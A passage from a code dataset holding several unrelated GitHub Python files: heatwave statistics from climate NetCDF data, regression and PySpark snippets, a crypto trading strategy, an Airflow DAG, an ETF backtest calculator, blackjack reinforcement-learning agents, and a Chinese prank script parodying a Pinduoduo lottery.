'sum_ex':np.nan},\n                          index=[0])\n    else:\n        DF = pd.DataFrame({'longitude':float(lon),\n                           'latitude':float(lat),\n                           'start':np.nan,\n                           'end':np.nan,\n                           'accumulated':np.nan,\n                           'mean':np.nan,\n                           'maxtemp':np.nan,\n                           'mintemp':np.nan,\n                           'max_ex':np.nan,\n                           'sum_ex':np.nan},\n                          index=[0])        \n    return DF\n\ndef loadDF(ncFile, main_var, time_var, ilon, ilat, tmax, daily, kelvin):\n    nc = Dataset(ncFile)\n    time = nc.variables[time_var]\n    df = pd.DataFrame({'date':pd.to_datetime([str(x) for x in num2date(time[:], \n                                                                       time.units)]),\n                       'temp':nc.variables[main_var][:,ilat,ilon]})\n    nc.close()\n    df['doy'] = df.date.dt.dayofyear\n    if not daily or not np.ma.is_masked(df.temp):\n        if tmax:\n            df = daymax(df)\n        else:\n            df = daymin(df)\n    if kelvin and not np.ma.is_masked(df.temp):\n        df = tranCelcius(df) # convert to celsius degree\n    return df\n\ndef func_mp(ncFile, main_var, time_var, tmax, daily, kelvin, q, window, umbral, \n            yStartP, yEndP, lon, lat, ilat, ilon):\n    lon0, lat0 = lon[ilon], lat[ilat]\n    print(f\"latitude: {lat0}, longitude: {lon0}\")\n    df = 
loadDF(ncFile, main_var, time_var, ilon, ilat, tmax, daily, kelvin)\n    result = hw1d(df, q, window, umbral, yStartP, yEndP, lon0, lat0)\n    return result\n\ndef hwbpointNC(ncFile, main_var, time_var, lon_var, lat_var, tmax = True,\n               daily = False,\n               kelvin = True,\n               filemask = None,\n               mNCVarName = None,\n               mNCLonName = None,\n               mNCLatName = None,\n               trim_lon = None,\n               trim_lat = None,\n               ncpu = None,\n               **args):\n    if not args:\n        raise AttributeError(\"Parameters to compute HW are not defined!\")\n    if ncpu is None:\n        raise AttributeError(\"The number of CPUs to be used must be provided\")\n    nc = Dataset(ncFile)\n    lon = nc.variables[lon_var][:]\n    lon = convertLon(lon)\n    lat = nc.variables[lat_var][:]\n    nc.close()\n    coord = coorobj(lon, lat, trim_lat=trim_lat, trim_lon = trim_lon)\n    ilat, ilon = coord.getInd(filemask=filemask,\n                              mNCVarName = mNCVarName,\n                              mNCLonName = mNCLonName,\n                              mNCLatName = mNCLatName)\n    func_mp_p = partial(func_mp, ncFile, main_var, time_var,tmax, daily, kelvin,\n                        args[\"q\"], \n                        args[\"window\"], \n                        args[\"umbral\"], \n                        args[\"yStartP\"], \n                        args[\"yEndP\"],\n                        lon, lat)\n    pool = Pool(ncpu)\n    dfs = pool.starmap(func_mp_p, zip(ilat,ilon))\n    pool.close()\n    pool.join()\n    hwDF = pd.concat(dfs,ignore_index=True)\n    return hwDF\n    \n\nif __name__ == \"__main__\":    \n    filename = \"/home/pzaninelli/TRABAJO/IGEO/comparacion/2m_temperature_6h_era_5_1950-2021_2_5.nc\"\n    hwdf = hwbpointNC(filename, main_var =\"t2m\", time_var = \"time\",\n                      lon_var = \"longitude\", lat_var = \"latitude\", tmax = False,\n                      daily = False, kelvin = True,\n                      filemask=\"/home/pzaninelli/TRABAJO/IGEO/comparacion/land_sea_mask_6h_era_5_01011979-31121979_2_5.nc\",\n                      mNCVarName=\"lsm\", mNCLatName=\"latitude\", mNCLonName=\"longitude\",\n                      trim_lon = [-22,45], trim_lat = [27,72], ncpu = 10,\n                      q= 90,window = 15, umbral = 3, yStartP = 1950, yEndP = 1980)","repo_name":"pzaninelli/HWCompute","sub_path":"HWCompute/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19882170613","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 27 23:16:11 2022\n\n@author: kundakci\n\"\"\"\n\n# Polynomial Linear Regression\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# We load the dataset with pandas into our dataframe object df...\ndf = pd.read_csv('polynomial.csv', sep=';')\n\n# We call the PolynomialFeatures function to create a polynomial regression object...\n# When calling this function we specify the degree (N) of the polynomial:\npolynomial_regression = PolynomialFeatures(degree=5)\nx_polynomial = polynomial_regression.fit_transform(df[['deneyim']])\n\n\n# We create our regression model object reg and call its fit method to fit x_polynomial against y,\n# i.e. we train our regression model on the existing real data:\nreg = LinearRegression()\nreg.fit(x_polynomial, df['maas'])\n\n# model visualization\ny_head = reg.predict(x_polynomial)\nplt.plot(df['deneyim'], y_head, color='red', label='polynomial regression')\nplt.legend()\nplt.scatter(df['deneyim'], df['maas'])\nplt.show()\n\n\nx_polynomial1 = polynomial_regression.fit_transform([[4.5]])\nreg = reg.predict(x_polynomial1)\n\n# #### The predicted salary fits the company policy beautifully, no one is short-changed ! 
:)\n","repo_name":"kundakcii/artificial_intelligence_repo","sub_path":"polynomial_linear_regression/proje_1/proje_1.py","file_name":"proje_1.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36899336574","text":"import pyspark.sql.functions as f\nfrom pyspark.sql import DataFrame\nfrom pyspark.ml.linalg import (\n VectorUDT,\n DenseVector,\n)\n\n\ndef prepare(dataset: DataFrame, row_name: str, prepared_row_name: str) -> DataFrame:\n return dataset.filter(\n dataset[row_name].isNotNull()\n ).select(\n '*',\n f.split(\n f.col(row_name),\n ' '\n ).alias(\n prepared_row_name\n )\n )\n\n\ndef vector_to_column(vector: DenseVector):\n return f.udf(\n lambda: vector,\n VectorUDT()\n )()\n","repo_name":"NobodyOne04/unix_lab","sub_path":"core/ml_engine/app/engine/src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69929945447","text":"import pandas as pd\nimport numpy as np\nfrom . import trade\nimport json\nimport time\nimport csv\nfrom datetime import datetime\nimport datetime\n\nfrom . import rtdp, rtstr, utils, rtctrl\n\n# Reference: https://crypto-robot.com/blog/bollinger-trend\n# Reference: https://github.com/CryptoRobotFr/backtest_tools/blob/main/backtest/single_coin/bol_trend.ipynb\n\n\"\"\"\n===========================\nsl: 0 stochOverBought: 0.95 stochOverSold: 0.05 offset: 2\nnb pair: 34\nfinal_wallet mean: 39149.95676470589\nfinal_wallet max: 911640.2\nvs_hold_pct mean: 18.317647058823532\nvs_hold_pct max: 239.58\nglobal_win_rate mean: 0.695\nglobal_win_rate max: 0.83\ntotal_trades mean: 84.1470588235294\ntotal_trades max: 187.0\nlist pairs: ['XRP', 'BCH', 'DOGE', 'AAVE', 'ATOM', 'SUSHI', 'SHIB', 'EGLD', 'AR', 'PEOPLE', 'IOTA', 'ZIL', 'APE', 'STORJ', '1INCH', 'LUNA2', 'FLOW', 'REEF', 'LUNC', 'MINA', 'ASTR', 'ANKR', 'ACH', 'HBAR', 'CKB', 'RDNT', 'HFT', 'ZEC', 'FLOKI', 'SPELL', 'SUI', 'STMX', 'UMA', 'SLP']\n===========================\n\"\"\"\n\nclass StrategyEnvelopeStochRSI(rtstr.RealTimeStrategy):\n\n def __init__(self, params=None):\n super().__init__(params)\n\n self.rtctrl = rtctrl.rtctrl(params=params)\n self.rtctrl.set_list_open_position_type(self.get_lst_opening_type())\n self.rtctrl.set_list_close_position_type(self.get_lst_closing_type())\n\n # self.envelope = EnvelopeLevelStatus(self.lst_symbols)\n # self.nb_envelope = 3\n\n # self.stochOverBought = 0.95\n # self.stochOverSold = 0.05\n\n # self.stochOverBought = 0.8\n # self.stochOverSold = 0.2\n\n self.stochOverBought = 0.9\n self.stochOverSold = 0.1\n\n self.zero_print = True\n\n self.tmp_debug_traces = True\n self.strategy_info_printed = False\n\n def get_data_description(self):\n ds = rtdp.DataDescription()\n ds.symbols = self.lst_symbols\n ds.interval = self.strategy_interval\n ds.candle_stick = self.candle_stick\n\n ds.fdp_features = {\"close\": {},\n \"stoch_rsi\": {\"indicator\": \"stoch_rsi\", \"window_size\": 30,\n \"stoch_rsi_window_size\":14, \"output\": [\"stoch_rsi\", \"stoch_rsi_k\", \"stoch_rsi_d\"]},\n\n \"postprocess1\": {\"indicator\": \"shift\", \"window_size\": 1, \"n\": \"1\",\n \"input\": [\"stoch_rsi_k\"]},\n \"postprocess2\": {\"indicator\": \"shift\", \"window_size\": 2, \"n\": \"2\",\n \"input\": [\"stoch_rsi_k\"]},\n \"postprocess3\": {\"indicator\": \"shift\", \"window_size\": 3, \"n\": \"3\",\n \"input\": [\"stoch_rsi_k\"]},\n \"stoch_rsi_pred\": 
{\"indicator\": \"stoch_rsi_pred\", \"window_size\": 30, \"pred_window_size\": 5,\n \"stoch_rsi_window_size\": 14},\n\n \"stoch_rsi_trend\": {\"indicator\": \"stoch_rsi_trend\", \"window_size\": 30, \"pred_window_size\":5,\n \"stoch_rsi_window_size\": 14,\n \"output\": [\"stoch_rsi_trend\", \"stoch_rsi_k_trend\", \"stoch_rsi_d_trend\"]},\n\n \"willr\": {\"indicator\": \"willr\", \"window_size\": 14},\n \"willr_trend\": {\"indicator\": \"willr_trend\", \"pred_window_size\":5, \"window_size\": 14},\n\n \"ao\": {\"indicator\": \"ao\", \"ao_window_1\": 6, \"ao_window_2\": 22, \"window_size\": 22},\n \"ao_trend\": {\"indicator\": \"ao_trend\", \"ao_window_1\": 6, \"ao_window_2\": 22, \"pred_window_size\":5, \"window_size\": 22},\n\n \"envelope\": {\"indicator\": \"envelope\", \"window_size\": 10,\n \"ma\": \"sma\", \"ma_window_size\": 5,\n # \"ma_offset_1\": \"2\", \"ma_offset_2\": \"5\", \"ma_offset_3\": \"7\",\n # \"ma_offset_1\": \"3\", \"ma_offset_2\": \"5\", \"ma_offset_3\": \"7\",\n \"ma_offset_1\": \"2\", \"ma_offset_2\": \"3\", \"ma_offset_3\": \"5\",\n \"output\": [\"ma_base\",\n \"envelope_long_1\", \"envelope_long_2\", \"envelope_long_3\",\n \"envelope_short_1\", \"envelope_short_2\", \"envelope_short_3\"]\n }\n }\n\n ds.features = self.get_feature_from_fdp_features(ds.fdp_features)\n\n if not self.strategy_info_printed:\n print(\"startegy: \", self.get_info())\n print(\"strategy features: \", ds.features)\n self.strategy_info_printed = True\n\n # ['close', 'envelope', 'ma_base', 'envelope_long_1', 'envelope_long_2', 'envelope_long_3', 'envelope_short_1', 'envelope_short_2', 'envelope_short_3']\n return ds\n\n def get_info(self):\n return \"StrategyEnvelopeStochRSI\"\n\n def authorize_multi_transaction_for_symbols(self):\n # Multi buy is authorized for this strategy\n return False\n\n def condition_for_opening_long_position(self, symbol):\n if self.df_current_data['close'][symbol] > self.df_current_data['envelope_long_1'][symbol]:\n return False\n elif self.df_current_data['close'][symbol] < self.df_current_data['envelope_long_1'][symbol]\\\n and self.df_current_data['stoch_rsi'][symbol] < self.stochOverSold:\n return True\n\n def condition_for_opening_short_position(self, symbol):\n if self.df_current_data['close'][symbol] < self.df_current_data['envelope_short_1'][symbol]:\n return False\n elif self.df_current_data['close'][symbol] > self.df_current_data['envelope_short_1'][symbol] \\\n and self.df_current_data['stoch_rsi'][symbol] > self.stochOverBought:\n return True\n\n def condition_for_closing_long_position(self, symbol):\n if self.df_current_data['close'][symbol] >= self.df_current_data['ma_base'][symbol]:\n return True\n else:\n return False\n\n def condition_for_closing_short_position(self, symbol):\n if self.df_current_data['close'][symbol] <= self.df_current_data['ma_base'][symbol]:\n return True\n else:\n return False\n\n def sort_list_symbols(self, lst_symbols):\n print(\"symbol list: \", lst_symbols)\n df = pd.DataFrame(index=lst_symbols, columns=['ao'])\n for symbol in lst_symbols:\n df.at[symbol, 'ao'] = self.df_current_data['ao'][symbol]\n df.sort_values(by=['ao'], inplace=True, ascending=False)\n lst_symbols = df.index.to_list()\n print(\"sorted symbols with AO: \", lst_symbols)\n return lst_symbols","repo_name":"cedfactory/crag","sub_path":"src/rtstr_envelopestochrsi.py","file_name":"rtstr_envelopestochrsi.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} 
+{"seq_id":"28715425829","text":"def getdate():\n import datetime\n return datetime.datetime.now()\n\na=str(getdate())\nb = input(\"Enter something\")\n# c=a+b\n# print(c)\nwith open(\"nik.txt\",\"a+\") as f:\n # a=str(getdate())\n # b = input(\"Enter something\")\n f.write(\"\\n\"+a+\"\\t\"+b)\n #f.write(b)\n a1=f.read()\n print(a1)\n#\n# xx = str(getdate())\n# print(xx)\n# print(type(xx))\n# print(getdate())\n# print(type(getdate()))","repo_name":"jhanikhil19/100-days-of-code","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40081856739","text":"from datetime import datetime, date\nfrom airflow import DAG\nfrom airflow.operators.python_operator import BranchPythonOperator, PythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import BashOperator\n\n\ndag = DAG('test_2',\n description='Test 2',\n catchup=False,\n schedule_interval= None,\n start_date=datetime(2020, 8, 1))\n\ndef python1():\n\treturn 2;\n\ndummy1 = PythonOperator(\n task_id='starting_task',\n python_callable=python1,\n dag=dag\n)\n\ndummy2 = BashOperator(\n task_id='branch1',\n bash_command=\"echo 3\",\n dag=dag\n)\n\ndummy3 = BashOperator(\n task_id='branch2',\n bash_command=\"sleep 50\",\n dag=dag\n)\n\ndummy4 = BashOperator(\n task_id='join_1',\n bash_command=\"echo 2\",\n dag=dag\n)\n\ndummy5 = BashOperator(\n task_id='join_2',\n bash_command=\"echo 3\",\n dag=dag\n)\n\ndummy1 >> [dummy2, dummy3] >> dummy4 >> dummy5","repo_name":"abhinavkrdeeps/airflow","sub_path":"dags/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9667447016","text":"import datetime as dt\nimport sqlite3 as db\nimport argparse\nfrom dateutil.relativedelta import relativedelta\nimport sys\nimport pandas as pd\nfrom calendar import isleap\nfrom tabulate import tabulate\nimport numpy as np\nimport math as mt\n\n# sumColumn\n#\n# input:\n# m, the input table\n# column, the index of the column values to sum\n# output:\n# the sum of the values in the input column\n# description:\n# This function calculates the sum of the values in the\n# input column of the table m.\ndef sumColumn(m, column):\n total = 0\n for row in range(len(m)):\n total += m[row][column]\n return total\n\n####################################################################################################\n# Main\n####################################################################################################\n# Parse the input values\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ticker\", nargs='+', help=\"Specify the ETF ticker\")\nparser.add_argument(\"-s\", \"--startdate\", type=lambda d: dt.datetime.strptime(d, '%Y-%m-%d'), help=\"Specify start date for backtest period (YYYY-mm-dd)\")\nparser.add_argument(\"-e\", \"--enddate\", type=lambda d: dt.datetime.strptime(d, '%Y-%m-%d'), help=\"Specify end date for backtest period (YYYY-mm-dd)\")\nargs=parser.parse_args()\n\n# If no start date is specified we assume 1970/1/1\nif args.startdate == None:\n args.startdate=dt.datetime(1970, 1, 1)\n\n# If no end date is specified we assume now.\nif args.enddate == None:\n args.enddate=dt.datetime.now()\n\n# Prepare the Performance Table that will contain, for the input ETF:\n# - Cimulative Return\n# - Annual Return\n# - Volatility \noutput_report = [[\"\"], 
[\"Start date\"], [\"End date\"], [\"\"], [\"Cum. return\"], [\"Ann. return\"], [\"Ann. volatility\"]]\nheaders=['Backtest']\n\n# Calculate the performance for each input ETF\nfor ticker in args.ticker:\n output_report_row = []\n headers.append(ticker)\n\n # Retrieve quotation for the ETF in the specified period\n try:\n cnx = db.connect('database/etfs.db')\n cur = cnx.cursor()\n cur.execute('SELECT Date, Close FROM quotes WHERE Ticker=\"' + ticker + '\" and Date >= \"' + args.startdate.strftime('%Y-%m-%d') + '\" and Date <= \"' + args.enddate.strftime('%Y-%m-%d') + '\"')\n all_quotes = cur.fetchall()\n except Exception as e:\n print('Failed to load quotes from database:')\n print(e)\n finally:\n cnx.close()\n\n # If, for the selected period, there is no quote exit immediately\n if len(all_quotes)==0:\n print(\"No quotes available for the period specified.\")\n sys.exit(0)\n\n # Retrieve dividends for the ETF if any\n try:\n cnx = db.connect('database/etfs.db')\n cur = cnx.cursor()\n cur.execute('SELECT Date, Dividend FROM dividends WHERE Ticker=\"' + ticker + '\" and Date >= \"' + args.startdate.strftime('%Y-%m-%d') + '\" and Date <= \"' + args.enddate.strftime('%Y-%m-%d') + '\"')\n all_dividends = cur.fetchall()\n except Exception as e:\n print('Failed to load dividends from database:')\n print(e)\n finally:\n cnx.close()\n\n start_date=dt.datetime.strptime(all_quotes[0][0], '%Y-%m-%d')\n end_date=dt.datetime.strptime(all_quotes[len(all_quotes)-1][0], '%Y-%m-%d')\n # Calculate the start price and end price of the selected period\n start_price=all_quotes[0][1]\n end_price=all_quotes[len(all_quotes)-1][1]\n\n # Calculate the sum of all the dividends in the selected period\n total_dividend=0\n if len(all_dividends)!=0:\n total_dividend=sumColumn(all_dividends, 1)\n\n # Cumulative Return\n # -----------------\n # Cumulative return is the percentage of total earning from start to finish\n # of the investment. For example, if you invested 1000$ on September 10th\n # 2007 and you sold everything in February 10th 2011 at a prince of 1300$\n # 1300$ you had a cumulative return of 30%.\n #\n # The formula to calculate the cumulative return is:\n # (end price/start price) -1\n # If you want the percentage number multiply the result for 100.\n cum_return_percentage=(((end_price+total_dividend)/start_price) - 1)*100\n\n # Annual Return (or CAGR)\n # -----------------------\n # The Cumulative Return is a good measure to know the total return of an\n # investement and to compare two investments if they occurred on the same\n # period of time. A better measure of return is the Annual Return (or CAGR)\n # because it calculate the return of the investment over a long period of\n # times (usually years) annually.\n # Suppose you have 100$ invested over 4 years and at the end of 4th year\n # sold everything at 146.41$.you\n #\n # Initial capital: 100$\n # 2007: 110.00$ -> 10% earning\n # 2008: 121.00$ -> 10% earning\n # 2008: 133.10$ -> 10% earning\n # 2009: 146.41$ -> 10% earning\n #\n # Your Cumulative earning was 46.41$ for a Cumulative Return of 46.41%.\n # Now if you try to divide the cumulative return by 4 you get:\n #\n # Cumulative Return/4=11.60%\n #\n # As you can see this is not a measure of the Annual Return because it\n # does not take in consideration the compound interest. In fact, this\n # formula measure the so called Average Annual Return.\n #\n # Average Annual Return=Cumulative Return/N\n #\n # where N is the number of years. 
In a time series where start date is not\n    # exactly January 1st and end date exactly December 31st you should\n    # count the number of years plus the additional days. For example, in a\n    # time frame of September 10th 2007 to February 10th 2011 we have 3 years\n    # and 122 days.\n    # 122 days=122/365=0.33 years so N=3.33 years.\n    #\n    # The formula to calculate the Annual Return is:\n    # Annual Return=(Final Capital/Initial Capital)^(1/N)-1\n    #\n    # Let's apply the formula to the above example.\n    #\n    # Annual Return=(146.41/100)^(1/4)-1=0.10\n    #\n    # Multiplying this value by 100 we get the original 10% growth rate you\n    # observed at the beginning of the example. The same considerations about N\n    # apply to this formula when the time frame is not exactly a multiple of\n    # one year.\n\n    # Since we already have the start and end price, to calculate the annual\n    # return we need only to calculate N\n    diffyears=end_date.year - start_date.year\n    difference=end_date - start_date.replace(end_date.year)\n    days_in_year=isleap(end_date.year) and 366 or 365\n    number_years=diffyears + difference.days/days_in_year\n    annual_return=(pow(((end_price+total_dividend)/start_price),(1/number_years))-1)*100\n\n    # Annual Volatility\n    # ---------------\n    # We are going to use Annual Volatility as a measure of risk. Suppose you\n    # have a price series:\n    #\n    # prices=(110.68, 111.559998, 109.879997, 109.099998,...,279.57)\n    #\n    # for each day d calculate the percentage change from the previous day (d-1).\n    #\n    # Change %=(Price(d)-Price(d-1))/Price(d-1)*100\n    #\n    # Luckily pandas has a function that allows us to calculate the percentage change\n    # on a series. In our example:\n    #\n    # prices change %=(n/a, 0.007951, -0.015059, -0.007099,..., -0.010161)\n    prices=list(zip(*all_quotes))[1]\n    df = pd.DataFrame({'Close':list(prices)})\n    annual_volatility=np.std(df['Close'].pct_change()*100)*mt.sqrt(252)\n\n    output_report[1].append(dt.datetime.strftime(start_date, '%Y-%m-%d'))\n    output_report[2].append(dt.datetime.strftime(end_date, '%Y-%m-%d'))\n    output_report[4].append(\"%.2f %%\" % cum_return_percentage)\n    output_report[5].append(\"%.2f %%\" % annual_return)\n    output_report[6].append(\"%.2f %%\" % annual_volatility)\nprint(\"\")\nprint(tabulate(output_report,headers,tablefmt='orgtbl'))\n","repo_name":"sasadangelo/finance","sub_path":"perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27330855997","text":"import numpy as np\n\nclass FVMC(object):\n    States = []\n    for s in range(12, 22):\n        for d in range(1, 11):\n            for a in range(2):\n                state = ''\n                if d == 1:\n                    state += 'A'\n                else:\n                    state += str(d)\n                \n                state += ' ' + str(s) + ' ' + str(a)\n                States.append(state)\n    K = len(States)\n\n    def __init__(self):\n        # The default policy to be evaluated is sticking only on 20 or 21\n        self.policy = ['hit' for i in range(self.K)]\n        self.policy[-40:] = ['stick' for i in range(40)]\n\n        self.V = np.zeros(self.K)\n        self.Returns = [[] for s in range(self.K)]\n\n    def update_values(self, episode_states, episode_rewards):\n        \"\"\" Update the V(s) values after an episode finishes \"\"\"\n        for s in set(episode_states):\n            i = episode_states.index(s) # index of the first visit of state s\n            R = sum(episode_rewards[i:]) # total return starting from first visit of s\n            self.Returns[s].append(R)\n            self.V[s] = np.mean(self.Returns[s])\n\n    def train(self, env, total_episodes):\n        \"\"\" Estimate the value of the states 
that the agent experiences. \n        1. Generate an episode using the policy\n        2. For each state that appeared in the episode, keep the return following the first\n        occurrence and average the Returns of each state visited in this episode. \"\"\"\n        for _ in range(total_episodes):\n            episode_states = [] # the states that will be visited in the current episode\n            episode_rewards = [] # the rewards of the episode\n\n            env.init_episode()\n            while not env.episode_finished:\n                s = env.get_state()\n                state = self.States.index(s)\n                action = self.policy[state]\n                reward = env.player_action(action)\n                episode_rewards.append(reward)\n                episode_states.append(state)\n\n            self.update_values(episode_states, episode_rewards)\n\nclass TD0(object):\n    States = []\n    for s in range(12, 22):\n        for d in range(1, 11):\n            for a in range(2):\n                state = ''\n                if d == 1:\n                    state += 'A'\n                else:\n                    state += str(d)\n                \n                state += ' ' + str(s) + ' ' + str(a)\n                States.append(state)\n    K = len(States)\n\n    def __init__(self):\n        # The default policy to be evaluated is sticking only on 20 or 21\n        self.policy = ['hit' for i in range(self.K)]\n        self.policy[-40:] = ['stick' for i in range(40)]\n\n        self.V = np.zeros(self.K)\n        self.Returns = [[] for s in range(self.K)]\n\n    def train(self, env, total_episodes, a, discount_rate):\n        \"\"\" Estimate the value of the states that the agent experiences. \n        1. Generate an episode using the policy\n        2. For each state visited, take action a according to the policy.\n        3. Observe the reward and the next state.\n        4. Update the value of the state. \"\"\"\n        for _ in range(total_episodes):\n            env.init_episode()\n            s = env.get_state()\n            state = self.States.index(s)\n            while not env.episode_finished:\n                action = self.policy[state]\n                reward = env.player_action(action)\n                if not env.episode_finished:\n                    next_s = env.get_state()\n                    next_state = self.States.index(next_s)\n                    dV = a * (reward + discount_rate * self.V[next_state] - self.V[state])\n                    self.V[state] += dV\n                    state = next_state\n                else:\n                    dV = a * (reward - self.V[state])\n                    self.V[state] += dV\n\nif __name__ == \"__main__\":\n    from environment.Env import Env\n\n    env = Env()\n    agent = TD0()\n\n    agent.train(env, 5 * 10**4, 0.1, 1)\n    for i in range(200):\n        print('state: ',TD0.States[i])\n        print('V(s): ', agent.V[i])","repo_name":"georgetz15/ai","sub_path":"ReinforcementLearning/BlackJack/Agents.py","file_name":"Agents.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
right=='y':\n\t\t\tprint('\\n\\n正在抽奖...')\n\t\t\ttime.sleep(ttttt)\n\t\t\tprint('你抽到了'+'\\033[32m'+str(give[req])+'\\033[0m'+'元!')\n\t\t\tprint('你真幸运!拼多多为你助力翻倍 ==> 获得'+'\\033[32m'+str(give[req]*times)+'\\033[0m'+'元!')\n\t\t\tmn.append(give[req]*times)\n\t\t\tprint('累积'+'\\033[36m'+str(sum(mn))+'\\033[0m'+'元!')\n\t\tif right=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\t\treq-=1\n\ndef level_3():\n\tprint('抽奖次数用完!拼多多为你助力,送你3次机会!')\n\tprint('你还有'+'\\033[35m'+str(3)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tright=input('是/否(y/n)继续抽奖:')\n\tif right=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(1)+'\\033[0m'+'元!')\n\t\tprint('你真幸运!拼多多为你助力翻8倍 ==> 获得'+'\\033[32m'+str(8)+'\\033[0m'+'元!')\n\t\tprint('累积'+'\\033[36m'+str(990+8)+'\\033[0m'+'元!')\n\tif right=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\tprint('你还有'+'\\033[35m'+str(2)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\trigt=input('是/否(y/n)继续抽奖:')\n\tif rigt=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(100)+'\\033[0m'+'枚硬币!')\n\t\tprint('你真幸运!拼多多为你助力翻10倍 ==> 获得'+'\\033[32m'+str(1000)+'\\033[0m'+'枚硬币!')\n\t\tprint('1000枚硬币可兑换为1元!\\n累积'+'\\033[36m'+str(990+8+1)+'\\033[0m'+'元!')\n\t\tprint('你还有'+'\\033[35m'+str(1)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tif rigt=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\ndef level_4():\n\tmoney=999\n\tcoin=990\n\trigt=input('是/否(y/n)继续抽奖:')\n\tif rigt=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(99)+'\\033[0m'+'枚硬币!')\n\t\tprint('你真幸运!拼多多为你助力翻10倍 ==> 获得'+'\\033[32m'+str(990)+'\\033[0m'+'枚硬币!')\n\t\tprint('1000枚硬币可兑换为1元!\\n你还剩'+'\\033[36m'+str(10)+'\\033[0m'+'枚硬币!')\n\t\tprint('你还有'+'\\033[35m'+str(0)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tif rigt=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\ndef can(al):\n\ttimes=1\n\tcoin=[1]\n\tres=[]\n\twhile True:\n\t\tif sum(res)>=al:\n\t\t\tprint('\\n\\033[31m恭喜你成功提现!!\\033[0m')\n\t\t\tend()\n\t\t\tsys.exit(1)\n\t\telse:\n\t\t\tgl=1.5/times\n\t\t\tres.append(gl)\n\t\t\tremain=10-sum(res)\n\t\t\tprint('\\n\\n请邀请微信用户助力继续抽奖吧!')\n\t\t\tr=input('是/否(y/n)已助力:')\n\t\t\tif r=='y':\n\t\t\t\tprint('\\n\\n正在抽奖...')\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tprint('你抽到了'+'\\033[32m'+str(gl)+'\\033[0m'+'枚硬币!')\n\t\t\t\tprint('还剩'+'\\033[35m'+str(remain)+'\\033[0m'+'枚硬币即可提现1000元!')\n\t\t\tif r=='n':\n\t\t\t\tnr='再考虑考虑?'\n\t\t\t\tzero=1\n\t\t\t\twhile zero<=10:\n\t\t\t\t\tprint(nr*zero)\n\t\t\t\t\ttime.sleep(ttttt)\n\t\t\t\t\tzero+=1\n\t\t\t\tsys.exit(1)\n\t\ttimes+=1\nprint('拼多多送你\\033[31m现金红包\\033[0m啦!\\n\\n')\ntime.sleep(ttttt)\nmode=input('请选择打款方式:\\n1. 微信支付\\n2. 
